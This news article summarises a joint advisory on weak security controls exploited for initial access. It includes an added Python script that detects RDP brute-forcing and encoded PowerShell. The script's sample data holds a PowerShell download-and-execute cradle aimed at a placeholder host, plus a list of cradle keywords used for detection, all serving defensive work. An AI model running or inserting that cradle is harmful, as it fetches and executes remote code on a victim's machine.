New advisory warns of hackers routinely exploiting poor security controls and practices for initial access

Global cybersecurity agencies have come together for the second time in a week to issue a joint cybersecurity advisory. This time, the guidance warns that malicious cyber actors routinely exploit weak security controls, poor configurations, and poor security practices as part of their initial access techniques. The joint cybersecurity advisory, released on Tuesday, says malicious actors exploit public-facing applications, external remote services, phishing, trusted relationships, and valid accounts to gain initial access to victim networks.

The advisory, titled ‘Weak Security Controls and Practices Routinely Exploited for Initial Access,’ rolled out a list of best practices to safeguard systems, including controlling access, hardening credentials, establishing centralized log management, deploying antivirus solutions, employing detection tools, operating services exposed on internet-accessible hosts with secure configurations, and keeping software updated. The latest guidance follows last week’s warning to secure managed service providers (MSPs) and their customers from cyber threats, issued after the agencies observed an increase in malicious cyber activity targeting such installations.

The Cybersecurity and Infrastructure Security Agency (CISA), the National Security Agency (NSA), and the FBI produced the advisory with help from the Canadian Centre for Cyber Security (CCCS), the New Zealand National Cyber Security Centre (NCSC-NZ), the Computer Emergency Response Team New Zealand (CERT NZ), the Netherlands National Cyber Security Centre (NCSC-NL), and the U.K. National Cyber Security Centre (NCSC-UK).

Security controls cover those safeguards or countermeasures primarily designed to protect the confidentiality, integrity, and availability of the system, its components, processes, and data.

Among the weak controls the guidance lists is multifactor authentication (MFA) not being enforced. MFA, particularly for remote desktop access, can help prevent account takeovers. With Remote Desktop Protocol (RDP) a common infection vector for ransomware, MFA is a critical tool in mitigating malicious cyber activity. The advisory also cites incorrectly applied privileges or permissions and errors in access control lists, which allow unauthorized users or system processes to access objects they should not be able to reach.

“Unpatched software may allow an attacker to exploit publicly known vulnerabilities to gain access to sensitive information, launch a denial-of-service attack, or take control of a system,” the advisory said. Running unpatched software is identified as one of the most commonly found poor security practices.

The joint cybersecurity advisory also warned about the use of vendor-supplied default configurations and default login usernames and passwords. “Many software and hardware products come ‘out of the box’ with overly permissive factory-default configurations intended to make the products user-friendly and reduce the troubleshooting time for customer service. However, leaving these factory default configurations enabled after installation may provide avenues for an attacker to exploit,” it added.

Network devices are also often pre-configured with default administrator usernames and passwords to simplify setup, the advisory said. These default credentials are not secure, as they may be physically labeled on the device or even readily available on the internet. “Leaving these credentials unchanged creates opportunities for malicious activity, including gaining unauthorized access to information and installing malicious software. Network defenders should also be aware that the same considerations apply for extra software options, which may come with preconfigured default settings,” it added.

Another weakness the advisory identifies is remote services, such as virtual private networks (VPNs), that lack sufficient controls to prevent unauthorized access. “During recent years, malicious threat actors have been observed targeting remote services. Network defenders can reduce the risk of remote service compromise by adding access control mechanisms, such as enforcing MFA, implementing a boundary firewall in front of a VPN, and leveraging intrusion detection system/intrusion prevention system sensors to detect anomalous network activity,” it added.

“Malicious cyber actors can use a myriad of methods to exploit weak, leaked, or compromised passwords and gain unauthorized access to a victim system. Malicious cyber actors have used this technique in various nefarious acts and prominently in attacks targeting RDP,” the advisory said. The advisory also lists unprotected cloud services as a weakness: misconfigured cloud services are common targets for cyber actors, and poor configurations can allow for sensitive data theft and even cryptojacking, it added.

“Cyber actors send emails with malicious macros—primarily in Microsoft Word documents or Excel files—to infect computer systems,” the advisory said. Initial infection can occur in various ways, such as when a user opens or clicks a malicious download link, PDF, or macro-enabled Microsoft Word document included in a phishing email. The guidance also covered poor endpoint detection and response. “Cyber actors use obfuscated malicious scripts and PowerShell attacks to bypass endpoint security controls and launch attacks on target devices. These techniques can be difficult to detect and protect against,” it added.
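Two of the weaknesses above, password attacks against RDP and obfuscated or encoded PowerShell, leave recognizable traces in Windows event logs. The script below is an added example written for this page, not code from the advisory or the agencies that issued it. It runs two detections over a constructed sample of events: a burst of RDP logon failures (EventID 4625, LogonType 10) from one source, and a PowerShell command line using `-EncodedCommand`, which it decodes (base64 over UTF-16LE, the encoding PowerShell expects) and scores against a small indicator list. The event field names are a simplified form of the Windows schema, the threshold and window are assumed starting points, and the encoded payload and hostname are placeholders built for the sample.

```python
"""Added example: detections for RDP password attacks and encoded PowerShell.
All events below are constructed for illustration, not real log data."""
import base64
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed payload, encoded the way -EncodedCommand expects (base64 over
# UTF-16LE). The host name is a placeholder.
SAMPLE_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
_ENCODED = base64.b64encode(SAMPLE_PAYLOAD.encode("utf-16le")).decode()

# Constructed sample events. 4625 = failed logon, 4624 = successful logon,
# LogonType 10 = RemoteInteractive (RDP), 4688 = process creation.
SAMPLE_EVENTS = [
    # six RDP logon failures from one source inside one minute
    *[{"time": f"2022-05-17T10:00:{i:02d}", "event_id": 4625, "logon_type": 10,
       "src_ip": "203.0.113.9", "user": "administrator"} for i in range(0, 60, 10)],
    # a single failure from another source: a typo, not an attack
    {"time": "2022-05-17T10:00:30", "event_id": 4625, "logon_type": 10,
     "src_ip": "198.51.100.5", "user": "alice"},
    # success from the brute-forcing host right after the failures
    {"time": "2022-05-17T10:01:05", "event_id": 4624, "logon_type": 10,
     "src_ip": "203.0.113.9", "user": "administrator"},
    # PowerShell process creation with a hidden, encoded command line
    {"time": "2022-05-17T10:02:00", "event_id": 4688,
     "cmdline": f"powershell.exe -nop -w hidden -enc {_ENCODED}"},
    # benign PowerShell usage
    {"time": "2022-05-17T10:02:10", "event_id": 4688,
     "cmdline": "powershell.exe -File C:\\scripts\\backup.ps1"},
]

RDP_FAIL_THRESHOLD = 5            # assumed tuning value
RDP_WINDOW = timedelta(seconds=60)  # assumed tuning value


def _t(s):
    return datetime.fromisoformat(s)


def detect_rdp_password_attacks(events, threshold=RDP_FAIL_THRESHOLD, window=RDP_WINDOW):
    """Flag source IPs with >= threshold RDP failures inside one window, and
    note whether an RDP success from the same IP followed the failures."""
    failures, successes = defaultdict(list), defaultdict(list)
    for e in events:
        if e.get("logon_type") != 10:
            continue
        if e["event_id"] == 4625:
            failures[e["src_ip"]].append(_t(e["time"]))
        elif e["event_id"] == 4624:
            successes[e["src_ip"]].append(_t(e["time"]))
    alerts = []
    for ip, times in failures.items():
        times.sort()
        best, start = 0, 0
        for end in range(len(times)):            # sliding window over failures
            while times[end] - times[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            followed = any(s >= times[-1] for s in successes.get(ip, []))
            alerts.append({"src_ip": ip, "failures": best, "success_after": followed})
    return alerts


# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc ...).
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")
INDICATORS = ("iex", "invoke-expression", "downloadstring", "net.webclient",
              "frombase64string", "-nop", "-w hidden", "bypass")


def detect_suspicious_powershell(events):
    """Decode -EncodedCommand payloads and score the visible plus decoded
    command text against INDICATORS. An encoded flag alone is reported too."""
    alerts = []
    for e in events:
        cmd = e.get("cmdline")
        if not cmd or "powershell" not in cmd.lower():
            continue
        decoded, m = None, ENCODED_FLAG.search(cmd)
        if m:
            try:
                decoded = base64.b64decode(m.group(1)).decode("utf-16le")
            except (ValueError, UnicodeDecodeError):
                decoded = None  # not valid -enc material; the flag is still suspicious
        text = (cmd + " " + (decoded or "")).lower()
        hits = [i for i in INDICATORS if i in text]
        if m or hits:
            alerts.append({"time": e["time"], "encoded": m is not None,
                           "decoded": decoded, "indicators": hits})
    return alerts


if __name__ == "__main__":
    for alert in detect_rdp_password_attacks(SAMPLE_EVENTS) + detect_suspicious_powershell(SAMPLE_EVENTS):
        print(alert)
```

On the sample, the RDP check reports only 203.0.113.9 (six failures in one window, followed by a success, which is the pattern that should page someone), and the PowerShell check reports only the encoded command line, with the decoded `IEX ... DownloadString` text attached so an analyst sees the payload rather than a base64 blob. In production the thresholds belong in a tuning file and the decoded text should be fed into the same indicator matching used for script block logging (EventID 4104).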

The advisory recommended that organizations strengthen their network defenses against these commonly exploited weak security controls and practices by controlling access. The measures it names include adopting a zero-trust security model that eliminates implicit trust, limiting the ability of local administrator accounts, and controlling who has access to organizational data and services.

Furthermore, the guidance advised implementing credential hardening, establishing centralized log management, employing antivirus programs, deploying appropriate detection tools, and searching for vulnerabilities. The advisory also called for maintaining rigorous configuration management programs and initiating a software and patch management program.

“As long as these security holes exist, malicious cyber actors will continue to exploit them,” Rob Joyce, NSA Cybersecurity Director, said in a media statement. “We encourage everyone to mitigate these weaknesses by implementing the recommended best practices.”

Industrial cybersecurity firm Dragos had assessed last month with high confidence that the biggest cybersecurity weaknesses European industrial infrastructure asset owners currently face are lack of asset visibility into their network and weak network authentication policies. In addition, the company gauged with low confidence that Europe is at low risk for localized or small-scale disruption or destruction, as motivated state-executed adversaries may perform low-stakes operations when deemed politically or economically advantageous.

Last month, U.S. security agencies and the Department of Energy (DOE) warned in a joint cybersecurity advisory that specific advanced persistent threat (APT) hackers have exhibited the capability to gain full system access to multiple industrial control system (ICS)/supervisory control and data acquisition (SCADA) devices. In addition, the APT hackers can leverage their tools’ modules to interact with targeted ICS/SCADA devices, enabling lower-skilled cyber hackers to emulate higher-skilled hacker capabilities.
